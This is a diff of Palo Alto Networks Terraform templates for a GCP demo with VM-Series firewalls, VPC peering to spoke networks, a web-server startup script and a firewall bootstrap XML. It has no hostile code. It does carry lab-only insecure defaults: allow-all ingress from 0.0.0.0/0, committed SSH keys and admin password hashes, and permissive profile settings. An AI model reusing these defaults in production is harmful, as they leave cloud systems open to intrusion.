diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf
new file mode 100644
index 00000000..dd140b46
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf
@@ -0,0 +1,127 @@
+variable vm_names {
+ type = "list"
+}
+variable vm_machine_type {}
+variable vm_zones {
+ type = "list"
+}
+variable vm_ssh_key {}
+
+variable vm_image {}
+variable vm_subnetworks {
+ type = "list"
+}
+
+variable vm_scopes {
+ type = "list"
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+
+variable internal_lb_create {
+ default = false
+}
+
+variable "internal_lb_health_check" {
+ default = "22"
+}
+
+variable "internal_lb_ports" {
+ type = "list"
+ default = ["80"]
+}
+
+variable "internal_lb_name" {
+ default = "intlb"
+}
+
+variable "internal_lb_ip" {
+ default = ""
+}
+
+variable create_instance_group {
+ default = false
+}
+
+variable startup_script {
+default = ""
+}
+
+
+resource "google_compute_instance" "vm" {
+ count = "${length(var.vm_names)}"
+ name = "${element(var.vm_names, count.index)}"
+ machine_type = "${var.vm_machine_type}"
+ zone = "${element(var.vm_zones, count.index)}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata_startup_script = "${var.startup_script}"
+
+
+ metadata {
+ serial-port-enable = true
+ sshKeys = "${var.vm_ssh_key}"
+ }
+
+ network_interface {
+ subnetwork = "${element(var.vm_subnetworks, count.index)}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.vm_image}"
+ }
+ }
+
+ service_account {
+ scopes = "${var.vm_scopes}"
+ }
+}
+
+resource "google_compute_instance_group" "instance_group" {
+ count = "${var.internal_lb_create}"
+ name = "${var.internal_lb_name}-group"
+ zone = "${var.vm_zones[0]}"
+
+ instances = [
+ "${google_compute_instance.vm.*.self_link}",
+ ]
+}
+
+
+
+
+resource "google_compute_health_check" "health_check" {
+ count = "${var.internal_lb_create}"
+ name = "${var.internal_lb_name}-check-${count.index}"
+
+ tcp_health_check {
+ port = "${var.internal_lb_ports[0]}"
+ }
+}
+
+resource "google_compute_region_backend_service" "backend_service" {
+ count = "${var.internal_lb_create}"
+ name = "${var.internal_lb_name}-backend-${count.index}"
+ health_checks = ["${google_compute_health_check.health_check.self_link}"]
+
+ backend {
+ group = "${google_compute_instance_group.instance_group.self_link}"
+ }
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule" {
+ count = "${var.internal_lb_create}"
+ name = "${var.internal_lb_name}-tcp"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = "${var.internal_lb_ip}"
+ ports = "${var.internal_lb_ports}"
+ subnetwork = "${var.vm_subnetworks[0]}"
+ backend_service = "${google_compute_region_backend_service.backend_service.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf
new file mode 100644
index 00000000..8a87285a
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf
@@ -0,0 +1,176 @@
+variable fw_subnetworks {
+ type = "list"
+}
+
+variable fw_names {
+ type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+ type = "list"
+}
+
+variable fw_cpu_platform {
+ default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+ default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+ default = false
+}
+
+variable fw_scopes {
+ type = "list"
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+ type = "list"
+ default = []
+}
+
+variable create_instance_group {
+ default = false
+}
+
+variable instance_group_names {
+ type = "list"
+ default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+ type = "list"
+ default = []
+}
+
+variable fw_nic0_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic1_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic2_ip {
+ type = "list"
+ default = []
+}
+
+resource "null_resource" "dependency_getter" {
+ provisioner "local-exec" {
+ command = "echo ${length(var.dependencies)}"
+ }
+}
+
+#************************************************************************************
+# CREATE VMSERIES
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+ count = "${length(var.fw_names)}"
+ name = "${element(var.fw_names, count.index)}"
+ machine_type = "${var.fw_machine_type}"
+ zone = "${element(var.fw_zones, count.index)}"
+ min_cpu_platform = "${var.fw_cpu_platform}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ tags = "${var.fw_tags}"
+
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+ serial-port-enable = true
+ sshKeys = "${var.fw_ssh_key}"
+ }
+
+ service_account {
+ scopes = "${var.fw_scopes}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[0]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic0_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[1]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic1_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[2]}"
+ network_ip = "${element(var.fw_nic2_ip, count.index)}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.fw_image}"
+ }
+ }
+
+ depends_on = [
+ "null_resource.dependency_getter",
+ ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+ count = "${(var.create_instance_group) ? length(var.fw_names) : 0}"
+ name = "${element(var.instance_group_names, count.index)}"
+ zone = "${element(var.fw_zones, count.index)}"
+ instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+}
+
+
+
+
+
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+ value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+ value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+ value = "${google_compute_instance_group.vmseries.*.self_link}"
+}
+
+
+output "fw_nic0_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf
new file mode 100644
index 00000000..e4511595
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf
@@ -0,0 +1,71 @@
+variable vpc_name {}
+
+variable subnetworks {
+ type = "list"
+}
+
+variable ip_cidrs {
+ type = "list"
+}
+
+variable regions {
+ type = "list"
+}
+
+variable ingress_allow_all {
+ default = true
+}
+
+variable ingress_sources {
+ type = "list"
+ default = ["0.0.0.0/0"]
+}
+
+resource "google_compute_network" "default" {
+ name = "${var.vpc_name}"
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+ count = "${length(var.subnetworks)}"
+ name = "${element(var.subnetworks, count.index)}"
+ ip_cidr_range = "${element(var.ip_cidrs, count.index)}"
+ region = "${element(var.regions, count.index)}"
+ network = "${google_compute_network.default.self_link}"
+}
+
+resource "google_compute_firewall" "ingress_all" {
+ count = "${var.ingress_allow_all}"
+ name = "${google_compute_network.default.name}-ingress-all"
+ network = "${google_compute_network.default.self_link}"
+ direction = "INGRESS"
+ source_ranges = "${var.ingress_sources}"
+
+ allow {
+ protocol = "all"
+ }
+}
+
+output "subnetwork_id" {
+ value = "${google_compute_subnetwork.default.*.id}"
+}
+
+output "subnetwork_name" {
+ value = "${google_compute_subnetwork.default.*.name}"
+}
+
+output "subnetwork_self_link" {
+ value = "${google_compute_subnetwork.default.*.self_link}"
+}
+
+output "vpc_name" {
+ value = "${google_compute_network.default.*.name}"
+}
+
+output "vpc_id" {
+ value = "${google_compute_network.default.*.id[0]}"
+}
+
+output "vpc_self_link" {
+ value = "${google_compute_network.default.*.self_link[0]}"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/outputs.tf b/gcp/adv_peering_2fw_2spoke/outputs.tf
new file mode 100644
index 00000000..dec2a032
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/outputs.tf
@@ -0,0 +1,37 @@
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+output " IMPORTANT!! PLEASE READ!! " {
+ value = [
+ "===================================================================================",
+ "Before proceeding, you must enable import/export custom routes on all peering links",
+ "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs",
+ "==================================================================================="]
+}
+output "GLB-ADDRESS " {
+ value = "http://${module.vmseries_public_lb.address}"
+}
+
+output "MGMT-URL-FW1 " {
+ value = "https://${module.vm_fw.fw_nic1_public_ip[0]}"
+}
+
+output "MGMT-URL-FW2 " {
+ value = "https://${module.vm_fw.fw_nic1_public_ip[1]}"
+}
+
+output "SSH-SPOKE1-FW1" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i "
+}
+
+output "SSH-SPOKE2-FW1" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i "
+}
+
+output "SSH-SPOKE1-FW2" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i "
+}
+
+output "SSH-SPOKE2-FW2" {
+ value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i "
+}
diff --git a/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php
@@ -0,0 +1,62 @@
+
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh
new file mode 100644
index 00000000..1349754f
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2 php7. libapache2-mod-php7.; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
diff --git a/gcp/adv_peering_2fw_2spoke/spoke1.tf b/gcp/adv_peering_2fw_2spoke/spoke1.tf
new file mode 100644
index 00000000..fbbe81ec
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/spoke1.tf
@@ -0,0 +1,61 @@
+provider "google" {
+ credentials = "${var.spoke1_project_authfile}"
+ project = "${var.spoke1_project}"
+ region = "${var.region}"
+ alias = "spoke1"
+}
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE1 VMs (w/ INTLB)
+#************************************************************************************
+module "vpc_spoke1" {
+ source = "./modules/create_vpc/"
+ vpc_name = "spoke1-vpc"
+ subnetworks = ["spoke1-subnet"]
+ ip_cidrs = ["10.10.1.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+
+ providers = {
+ google = "google.spoke1"
+ }
+}
+
+module "vm_spoke1" {
+ source = "./modules/create_vm/"
+ vm_names = ["spoke1-vm1", "spoke1-vm2"]
+ vm_zones = ["${var.region}-a", "${var.region}-a"]
+ vm_machine_type = "f1-micro"
+ vm_image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ vm_subnetworks = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"]
+ vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}"
+ startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" // default "" - runs no startup script
+
+ internal_lb_create = true // default false
+ internal_lb_name = "spoke1-intlb" // default "intlb"
+ internal_lb_ports = ["80", "443"] // default ["80"]
+ internal_lb_ip = "10.10.1.100" // default "" (assigns an any available IP in subnetwork )
+
+ providers = {
+ google = "google.spoke1"
+ }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE1-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke1_to_trust" {
+ name = "spoke1-to-trust"
+ network = "${module.vpc_spoke1.vpc_self_link}"
+ peer_network = "${module.vpc_trust.vpc_self_link}"
+
+ provisioner "local-exec" {
+ command = "sleep 45"
+ }
+
+ depends_on = [
+ "google_compute_network_peering.trust_to_spoke2",
+ ]
+ provider = "google.spoke1"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/spoke2.tf b/gcp/adv_peering_2fw_2spoke/spoke2.tf
new file mode 100644
index 00000000..718ff170
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/spoke2.tf
@@ -0,0 +1,55 @@
+provider "google" {
+ credentials = "${var.spoke2_project_authfile}"
+ project = "${var.spoke2_project}"
+ region = "${var.region}"
+ alias = "spoke2"
+}
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE2 VM
+#************************************************************************************
+module "vpc_spoke2" {
+ source = "./modules/create_vpc/"
+ vpc_name = "spoke2-vpc"
+ subnetworks = ["spoke2-subnet"]
+ ip_cidrs = ["10.10.2.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+
+ providers = {
+ google = "google.spoke2"
+ }
+}
+
+module "vm_spoke2" {
+ source = "./modules/create_vm/"
+ vm_names = ["spoke2-vm1"]
+ vm_zones = ["${var.region}-a"]
+ vm_machine_type = "f1-micro"
+ vm_image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ vm_subnetworks = ["${module.vpc_spoke2.subnetwork_self_link[0]}"]
+ vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}"
+
+ providers = {
+ google = "google.spoke2"
+ }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE2-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke2_to_trust" {
+ name = "spoke2-to-trust"
+ network = "${module.vpc_spoke2.vpc_self_link}"
+ peer_network = "${module.vpc_trust.vpc_self_link}"
+
+ provisioner "local-exec" {
+ command = "sleep 45"
+ }
+
+ depends_on = [
+ "google_compute_network_peering.spoke1_to_trust",
+ ]
+ provider = "google.spoke2"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/variables.tf b/gcp/adv_peering_2fw_2spoke/variables.tf
new file mode 100644
index 00000000..f273131f
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/variables.tf
@@ -0,0 +1,65 @@
+#************************************************************************************
+# GCP VARIABLES
+#************************************************************************************
+variable "region" {
+ default = "us-east4"
+}
+
+#************************************************************************************
+# main.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "main_project" {
+ description = "Existing project ID for main project (all resources deployed in main.tf)"
+ default = "host-project-242119"
+}
+
+variable "main_project_authfile" {
+ description = "Authentication file for main project (all resources deployed in main.tf)"
+ default = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# spoke1.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke1_project" {
+ description = "Existing project for spoke1 (can be the same as main project and can be same as main project)."
+ default = "host-project-242119"
+}
+
+variable "spoke1_project_authfile" {
+ description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)"
+ default = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# spoke2.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke2_project" {
+ description = "Existing project for spoke2 (can be the same as main project and can be same as main project)."
+ default = "host-project-242119"
+}
+
+variable "spoke2_project_authfile" {
+ description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf and can be same as main project)"
+ default = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# VMSERIES SSH KEY & IMAGE (not required if bootstrapping)
+#************************************************************************************
+variable "vmseries_ssh_key" {
+ default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDa7UUo1v42jebXVHlBof9E9GAFfalTndZQmvlmFu9e88euqrLI4xEZwg9ihwPFVTXOmrAogye6ojv5rbf3f13ZFYB+USjcR/9RFX+DKkPmXluC5Xq3z0ZlxY3QETHSlr6G8pfEqNwFebYJmKZ1MVNUztmb1DTIhjbFN4IAK/8NzQTbOYnEbXV4BB9E9Xe7dtuDuQrgaoII7KITnYdY4tjI10/K01Ay52PC7eISvZBRZntto2Mg1WjWQAwyIJHFC8nXoE04Wbzv91ohLfs/Og/dSOhdFymX1KVx5XSZWZ0POEOFY3rsDHFDrMiZIxipfuvBtEsznExp7ybkIDtWOxNX admin"
+}
+
+#************************************************************************************
+# UBUNTU SSH KEY
+#************************************************************************************
+variable "ubuntu_ssh_key" {
+ default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDk7y0D0Rz4F5J9Lu7gtTRTaEkJdWNLpmnDXcvHvaNC3euQ0KITIU6XaPHlXiB1M8pCrmBw3CFkFLxnPoGHrcN39wi2BR9d6Y1piz1v0gJqbggdMloSnrz51OVPqqC5BjtN/lB9hTcyNrh4MDfv37sRChHJb31s934vbj+qeiR16ZeLHH5moRXnyuzIvVUePnXHZvYz0M+YxJtvf806cz+Dvio72Y5g69/DUWReTNZ3h51MKseYMJT0Uu7mPJUZlH+xURc8zzzFazTE1jD7qL2z497si7oVHzmHm5nCECNayore3jzp5YYQkzEfe2fujxeM4UGlEBYuMkUxlH8QV5qN ubuntu"
+}
+
+variable "vmseries_image" {
+ # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814"
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
+ # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf
new file mode 100644
index 00000000..ef6db3f1
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf differ
diff --git a/gcp/adv_peering_2fw_2spoke_common/README.md b/gcp/adv_peering_2fw_2spoke_common/README.md
new file mode 100644
index 00000000..0ac8b6bc
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/README.md
@@ -0,0 +1,59 @@
+# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VPCs
+
+Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to internal load balancers in the trust VPC.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+
+
+
+
+
+
+## Prerequistes
+* Valid GCP Account with existing project
+* Access to GCP Cloud Terminal or to a machine with a Terraform 12 installation
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In your project, open GCP Cloud Terminal and run the following.
+```
+$ gcloud services enable compute.googleapis.com
+$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo
+$ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and edit variables (lines 1-4) to match your Project ID, SSH Key (from step 1), and VM-Series type.
+
+```
+$ vi terraform.tfvars
+```
+
+
+Your terraform.tfvars should look like this before proceeding
+
+
+
+
+### Prerequistes
+1. Valid GCP Account
+
+### How To
+Setup Project (all commands are run from Google Cloud Terminal or from local machine with terraform v12.0 installed)
+```
+ $ gcloud services enable compute.googleapis.com
+ $ ssh-keygen -f ~/.ssh/ -t rsa -C
+ $ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_4fw_2spoke
+```
+
+Run Build
+```
+ # Edit terraform.tfvars to match project ID, SSH Key, and PAN-OS version and license.
+
+ $ terraform init
+ $ terraform apply
+```
+
+Destroy Build
+```
+ $ terraform destroy
+```
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml
new file mode 100644
index 00000000..e7e275ee
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml
@@ -0,0 +1,898 @@
+
+
+
+
+
+
+
+ yes
+
+
+ $1$omtpasik$JVuMCKVuxaIHBIkdrbR4k.
+
+
+
+
+ yes
+
+
+ $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ.
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ yes
+
+ 1460
+
+ no
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ yes
+
+ 1460
+
+ no
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+ 192.168.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/2
+ 10
+ 10.10.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/2
+ 10
+ 10.10.2.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ download-and-install
+ 15
+
+
+
+
+
+
+ download-and-install
+ 30
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ vm-series
+
+
+ 208.67.222.222
+ 208.67.220.220
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ yes
+
+ no
+
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+ 22
+
+
+
+
+
+
+ 221
+
+
+
+
+
+
+ 222
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ping
+
+
+ application-default
+
+
+ any
+
+ yes
+ yes
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ yes
+ yes
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ tcp-221
+ tcp-222
+
+
+ any
+
+ yes
+ yes
+ allow
+ no
+ If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ service-http
+ ipv4
+ no
+
+ spoke1-intlb
+ 80
+
+ ethernet1/1
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ tcp-221
+ ipv4
+
+ spoke1-vm
+ 22
+
+ ethernet1/1
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ untrust
+
+
+
+ any
+
+ tcp-222
+ ipv4
+
+ spoke2-vm
+ 22
+
+ ethernet1/1
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+ WW's profile
+
+
+
+
+
